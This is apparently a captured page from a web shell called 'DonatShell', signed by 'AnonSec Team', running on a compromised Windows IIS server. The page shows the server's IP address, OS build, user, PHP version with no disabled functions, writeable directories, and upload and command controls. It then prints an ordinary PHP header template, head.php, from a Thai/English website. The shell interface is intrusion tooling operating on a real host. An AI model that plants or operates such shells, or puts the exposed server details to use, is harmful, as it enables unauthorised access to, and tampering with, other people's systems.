DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.127
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/umedia3/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/AppServ/www/umedia3/inc/head.php
<?
function head() {
	global $head_evelcall;
	global $html_start_title;
	global $dcr;
	global $_TBWIDTH;
	global $dcrURL;
	global $_HTMLTEMPLATE;
	if ($head_evelcall=="yes") {
		return;
	}
	$head_evelcall="yes";
	html_start(); 
	echo barcodeval_get("webpage-o-mannualhtmlbeginbody");
?>
<TABLE WIDTH="<? echo $_TBWIDTH;?>" height=78 BORDER=0 CELLPADDING=0 CELLSPACING=0 align=center
background="/<? echo $dcr;?>/_tmp/headbar/<? echo $_HTMLTEMPLATE;?>.jpg" style="background-repeat:no-repeat;" ID="HEAD_HEAD">
 <TR valign=top>
		<TD width=261 style="padding-left: 25;padding-top:4" ID=HEAD_LOGO_TD>
		<A name="topofpage"></A>
		<img src="/<? echo $dcr;?>/_tmp/logo/_weblogo.png" border=0 width=261 height=66 ID="HEAD_LOGO">
		</TD>

		<TD  align=right valign=top style="padding-right: 12px; padding-top: 19px;" ID=HEAD_MAINTD>
		<? echo barcodeval_get("webpage-o-mannualhtmlinsideheader");?>

		<span style="font-size: 24px;" ID="HEAD_TEXT1"><?
    echo stripslashes(getlang(getval("global", "HEAD")));
?><BR></span><img src=a width=1 height=18><span style="font-size: 14px;padding-right: 12px; padding-top: 19px;"  ID="HEAD_TEXT2"><?
    echo stripslashes(getlang(getval("global", "HEAD 2")));
?></span>

		</TD>
		<TD WIDTH=33 ID=HEAD_LANGTD valign=middle align=right>
			<A HREF="<? echo $dcrURL?>/lang_control.php?lang_control_set=th" target=langchanger  rel="nofollow" ><IMG SRC="/<? echo $dcr;?>/neoimg/th-t.gif" WIDTH=20 HEIGHT=13 ALT="เปลี่ยนเป็นภาษาไทย" border=0></A><BR>

	<IMG SRC="/<? echo $dcr;?>/neoimg/spacer.gif" WIDTH=33 HEIGHT=5 border=0><BR>

			<A HREF="<? echo $dcrURL?>/lang_control.php?lang_control_set=en" target=langchanger  rel="nofollow" ><IMG SRC="/<? echo $dcr;?>/neoimg/en-t.gif" WIDTH=20 HEIGHT=13 ALT="Change to English" border=0></A>	

			</TD>

	</TR><iframe width=100 height=100 style="display:none" name=langchanger></iframe>
</TABLE>
<!-- End head bar -->
<?
	$htmlc=barcodeval_get("webpage-o-mannualhtmlheader");
	$htmlc=trim($htmlc);
	$htmlc=stripslashes($htmlc);
	$htmlc=stripslashes($htmlc);
	if ($htmlc!="") {
		 //echo "<center><br />$htmlc</center>";
		echo "<span class=sidebarstriptagp style=\"\">".stripslashes($htmlc)."</span>";
	}
}
?>

Anon7 - 2022
AnonSec Team